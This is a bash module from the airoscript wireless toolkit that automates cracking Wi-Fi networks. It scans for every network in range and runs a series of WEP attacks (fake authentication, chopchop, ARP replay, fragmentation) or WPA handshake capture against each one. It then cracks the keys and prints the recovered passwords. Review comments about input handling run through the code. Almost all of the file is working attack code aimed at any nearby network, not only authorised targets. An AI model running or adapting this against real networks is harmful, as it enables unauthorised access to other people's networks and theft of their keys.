# Autocrack functions file for airoscript.

# Copyright (C) 2011 David Francos Cuartero
#        This program is free software; you can redistribute it and/or
#        modify it under the terms of the GNU General Public License
#        as published by the Free Software Foundation; either version 2
#        of the License, or (at your option) any later version.

#        This program is distributed in the hope that it will be useful,
#        but WITHOUT ANY WARRANTY; without even the implied warranty of
#        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#        GNU General Public License for more details.

#        You should have received a copy of the GNU General Public License
#        along with this program; if not, write to the Free Software
#        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
# FUCKING UNPOLISHED, but... it seems to work.

# Placeholder: the dump-trimming steps below are commented out, so calling this
# prints nothing and hands back the status that was current on entry.
unknown() {
    #ap_array=`cat $DUMP_PATH/dump-02.csv | grep -a -n Station | awk -F : '{print $1}'`
    #head -n $ap_array $DUMP_PATH/dump-01.csv &> $DUMP_PATH/dump-02.csv
    return "$?"
}

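# Print the number of lines in $DUMP_PATH/dump-02.csv on stdout.
# Globals:  DUMP_PATH (read)
# Outputs:  the line count; 0 when the file cannot be read
# The path is quoted so a DUMP_PATH containing spaces still resolves to a
# single file, and the counter is local so the caller's variables are left
# alone. Reading via stdin makes wc print only the number, with no file name
# to strip off.
count_aps() {
    local line_count
    line_count=$(wc -l < "$DUMP_PATH/dump-02.csv")
    # Arithmetic expansion drops the leading padding some wc builds emit.
    echo "$(( ${line_count:-0} ))"
}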

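# Run the unattended sequence: scan, build the target list in dump-02.csv,
# call autopwn once per counted entry, then list every *.key file found in
# $DUMP_PATH together with its contents.
# Globals read:    path, DUMP_PATH, mark, Host_MAC, Host_SSID
#                  (Host_* are presumably filled in by selectAp - confirm)
# Globals written: F, AUTO, QUIET, INTERACTIVE, MAX_TARGETS, writekey,
#                  attack_functions_wep, attack_functions_wpa, i, file
# autoscan_autopwn, filter_ssid, selectAp, cleanautovars, tag and warn are
# not defined in this file section.
# NOTE(review): Host_MAC and Host_SSID appear to come from parsed scan output,
# i.e. from data other devices control. They are interpolated into file paths
# below; treat them as untrusted wherever they are used.
doauto() {
    source "$path/autopwn"
    F=0; export AUTO=1; export QUIET=1; export INTERACTIVE=0
    autoscan_autopwn
    #unknown;
    # Blank everything up to and including the first "BSSID" line and from the
    # first "Station" line onwards, then reverse the line order. The blanked
    # lines stay in the file as empty lines. 2>/dev/null applies to tac only.
    sed -e '1,/BSSID/ s/.*//' -e '/Station/,$ s/.*//' "$DUMP_PATH/dump-01.csv" \
        | tac > "$DUMP_PATH/dump-02.csv" 2>/dev/null
    filter_ssid
    MAX_TARGETS=$(count_aps)
    echo
    attack_functions_wep=(wep_attacks_fakeauto wep_attacks_fakeinteractive wep_attacks_chopchop wep_attacks_caffelate wep_attacks_hirte wep_attacks_arpreplay_auto wep_attacks_arpreplay_interactive wep_attacks_fragmentation wep_attacks_chopchopclient wep_attacks_pskarp)
    attack_functions_wpa=(wpa_attacks_handshake)
    tag; warn "${mark}Networks detected $MAX_TARGETS"; sleep 1

    # The seq output is expanded once before the loop starts, so autopwn
    # reusing the global "i" for its own loop cannot disturb this iteration.
    # Quoting MAX_TARGETS means an empty count yields no iterations at all.
    for i in $(seq 1 "$MAX_TARGETS"); do
        tag; warn "${mark}Trying to crack target $i"

        export AUTO=2; selectAp; sleep 1
        export writekey="-l $DUMP_PATH/$Host_MAC.key"
        if [[ -n "$Host_SSID" ]]; then
            autopwn
        else
            tag; warn "${mark}Couldn't find essid, next try"
        fi
    done
    cleanautovars

    tag; warn "${mark}Cracked networks:"
    # Key files hold recovered keys in clear text and are echoed as-is.
    for file in "$DUMP_PATH"/*.key; do
        # With no match the glob stays literal; skip it instead of cat-ing it.
        [[ -e "$file" ]] || continue
        # NOTE(review): bash's builtin echo prints "\t" literally unless
        # xpg_echo or -e is in effect; left unchanged here.
        echo "\t${mark}$file : $(cat -- "$file")"
    done
}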

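# Decide what happens after a cracking attempt: configure and exit, quit, or
# carry on.
# Globals read:    options_autoconfigure, path, mark
# Globals written: ans
# Returns: 0 when the auto-configure path ran and doexit returned 0;
#          1 when the user chose anything other than "q" (callers in this file
#          chain on that status, so it is kept);
#          otherwise the status of "doexit killme".
# check_function, configure, doexit and warn are defined outside this file.
continue_autocrack() {
    if [[ $options_autoconfigure ]]; then
        check_function doexit || source "$path/internal/exit"
        configure
        # As before, a non-zero status from doexit falls through to the prompt.
        doexit && return 0
    fi

    # -r keeps a typed backslash literal instead of starting an escape.
    read -r -p "Press c to configure, q to quit, any key to continue" -s -n1 ans
    # Quoted so a key such as "*" is echoed back rather than glob-expanded
    # into the names of files in the current directory.
    echo "$ans"; echo; echo

    if [[ "$ans" == "c" ]]; then
        check_function doexit || source "$path/internal/exit"
        configure
        doexit
    fi

    [[ "$ans" == "q" ]] || return 1
    warn "${mark}Exiting..."
    check_function doexit || source "$path/internal/exit"
    doexit killme
}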

# Work through the attack list for the currently selected network and poll
# until check_if_worked reports success, then run the cracking step.
# Globals read:    path, Host_ENC, Host_MAC, DUMP_PATH, mark, oldclear,
#                  attack_functions_wpa, attack_functions_wep, handshakes
# Globals written: F, AUTO, QUIET, INTERACTIVE, next, count, attack_functions,
#                  min_ivs, wait_for_execute, clear, i
# check_function, cleanp, tag, warn, specialwarn, cleanautovars,
# selectcracking and Crack_with_dictionary_generator are defined elsewhere.
# NOTE(review): Host_MAC is expanded unquoted inside the backtick `cat` below;
# it presumably comes from parsed scan output, so treat it as untrusted.
autopwn(){
    # presumably check_function tests whether the named function exists and
    # the helper file is sourced only when it does not - confirm
    check_function cleanp || source $path/internal/childs

    # "next" is assigned here but not read anywhere in this block.
    F=0; export AUTO=1; export QUIET=1; export INTERACTIVE=0; next=0; count=0
    # Both assignments are scalar (no parentheses). The WPA arm joins the whole
    # array into one string; the WEP arm uses ${attack_functions_wep} with no
    # subscript, which bash expands to element 0 only.
    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { attack_functions=${attack_functions_wpa[@]}; min_ivs=10; } || attack_functions=${attack_functions_wep}

    # Unquoted on purpose or not, the scalar is word-split into function names.
    for i in ${attack_functions[@]}; do
        tag; echo "${mark}Attack $count. Using $i in $Host_MAC"
        # $i and cleanp are started in the background, get_min_ivs runs in the
        # foreground; all output of the three is discarded.
        { $i & cleanp & get_min_ivs; } &> /dev/null
        [[ "$Host_ENC" =~ (.*)WPA(.*) ]] || {  
            tag; warn "${mark}Needed ivs: $min_ivs"
        }

        # NOTE(review): no break is visible in this loop, so the lines after
        # its "done" look reachable only if something called here exits the
        # script (continue_autocrack calls doexit) - confirm.
        while [ "1" ]; do 
            sleep 5 && {
                check_if_worked
                # In "A && { ... } || { ... }" the second group also runs when
                # the last command of the first group returns non-zero, not
                # only when check_if_worked failed.
                [[ $? == 0 ]] && { 
                    warn "${mark}Trying to crack network, we have enough ivs or handshakes.";
                    cleanautovars;

                    # Use the dictionary generator when available, otherwise
                    # fall back to selectcracking with wait_for_execute set.
                    check_function Crack_with_dictionary_generator && {
                        Crack_with_dictionary_generator autocrack 
                    } || {
                        export wait_for_execute=1; AUTO=1; selectcracking 1; AUTO=0; export wait_for_execute=0;
                    }
                    cleanautovars;
                    # Success is judged by the key file existing; its contents
                    # (the recovered key, in clear text) are passed to warn.
                    [[ -e $DUMP_PATH/$Host_MAC.key ]] && warn "${mark}Network cracked, password is  `cat $DUMP_PATH/$Host_MAC.key`" || warn "${mark}Network NOT cracked. Something failed, if your enc is WPA probably key is not in your ~/.airoscript/wordlist.txt"

                    continue_autocrack
                 } || {
                    # Progress line: $handshakes is whatever check_if_handshake
                    # last stored; the IV count is re-read from the CSV.
                    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && {  
                        specialwarn "\r${mark}Current Handshakes: $handshakes"  ;
                    } || {
                        specialwarn "\r${mark}Current IVS: `check_all_ivs`"  ;
                    }
                }
            }
        done
        count=$(( $count + 1 ))
    done

    cleanautovars
    # oldclear is not set in this block; presumably saved by the caller's
    # environment - confirm.
    clear=$oldclear;

}

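# Print field 14 (whitespace-separated, commas removed) of every line in
# $DUMP_PATH/<Host_MAC>-01.csv that starts with $Host_MAC.
# Globals: DUMP_PATH, Host_MAC (read)
# Outputs: one value per matching line on stdout
# Host_MAC is handed to awk as data with -v and compared as a literal prefix,
# so its contents can never be parsed as part of the awk program or as a
# regular expression. The file path is quoted so spaces in DUMP_PATH do not
# split it into several arguments.
check_all_ivs() {
    awk -v mac="$Host_MAC" '
        substr($0, 1, length(mac)) == mac { gsub(/,/, "", $14); print $14 }
    ' "${DUMP_PATH}/${Host_MAC}-01.csv"
}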

# Set the global min_ivs threshold for the selected network.
# Globals read:    Host_ENC, autopwn_min_ivs
# Globals written: min_ivs, a
# WPA targets always get 10. Otherwise the exit status of
# "Crack_with_dictionary_generator return_ivs" is used as the threshold, with
# 255 (also used when that function is unavailable) meaning "fall back to
# $autopwn_min_ivs".
get_min_ivs() {
    if [[ "$Host_ENC" =~ (.*)WPA(.*) ]]; then
        min_ivs=10
        return
    fi

    if check_function Crack_with_dictionary_generator; then
        Crack_with_dictionary_generator return_ivs
        a=$?
    else
        a=255
    fi

    if [[ "$a" == 255 ]]; then
        min_ivs=$autopwn_min_ivs
    else
        min_ivs=$a
    fi
}

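# Store in the global "handshakes" the count parsed from $AIRCRACK's output
# for $DUMP_PATH/<Host_MAC>-01.cap and report whether it is above zero.
# Globals read:    AIRCRACK, DUMP_PATH, Host_MAC
# Globals written: handshakes
# Returns: 0 when handshakes > 0, 1 otherwise
# Field 5 of lines containing "handshake" is taken as the count (presumably
# from a "(N handshake)" column - confirm against the tool's output). That
# field position shifts when an earlier column contains spaces, and the text
# includes names supplied by the captured networks, so the value is accepted
# only if it is all digits before it reaches arithmetic evaluation.
check_if_handshake() {
    # $AIRCRACK is left unquoted in case it carries options as well as the
    # program name; the capture path is quoted.
    handshakes=$(awk '/handshake/ {gsub(/\(/, "", $5); print $5}' <( $AIRCRACK "$DUMP_PATH/${Host_MAC}-01.cap" ))
    # Empty, multi-line or non-numeric output counts as zero.
    [[ -n "$handshakes" && "$handshakes" != *[!0-9]* ]] || handshakes=0
    # 10# forces base 10 so a leading zero is not read as octal.
    (( 10#$handshakes > 0 ))
}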

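# Report whether enough material has been collected for the selected network.
# Globals read:    Host_ENC, mark, handshakes, min_ivs
# Globals written: ivs (min_ivs and handshakes are written by the helpers)
# Returns: 0 when a WPA handshake was seen, or when the IV count read by
#          check_all_ivs is greater than min_ivs; 1 otherwise.
# The IV count is parsed out of a capture-derived CSV, so it is accepted only
# if it is all digits before being used in arithmetic; anything else counts
# as 0. A non-numeric threshold never reports success.
check_if_worked() {
    if [[ "$Host_ENC" =~ (.*)WPA(.*) ]]; then
        if check_if_handshake; then
            tag; warn "${mark}Got WPA handshake ($handshakes eapol packets)"
            return 0
        fi
        return 1
    fi

    get_min_ivs
    ivs=$(check_all_ivs)
    [[ -n "$ivs" && "$ivs" != *[!0-9]* ]] || ivs=0
    [[ -n "$min_ivs" && "$min_ivs" != *[!0-9]* ]] || return 1
    # 10# forces base 10 so leading zeros are not read as octal.
    (( 10#$ivs > 10#$min_ivs ))
}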
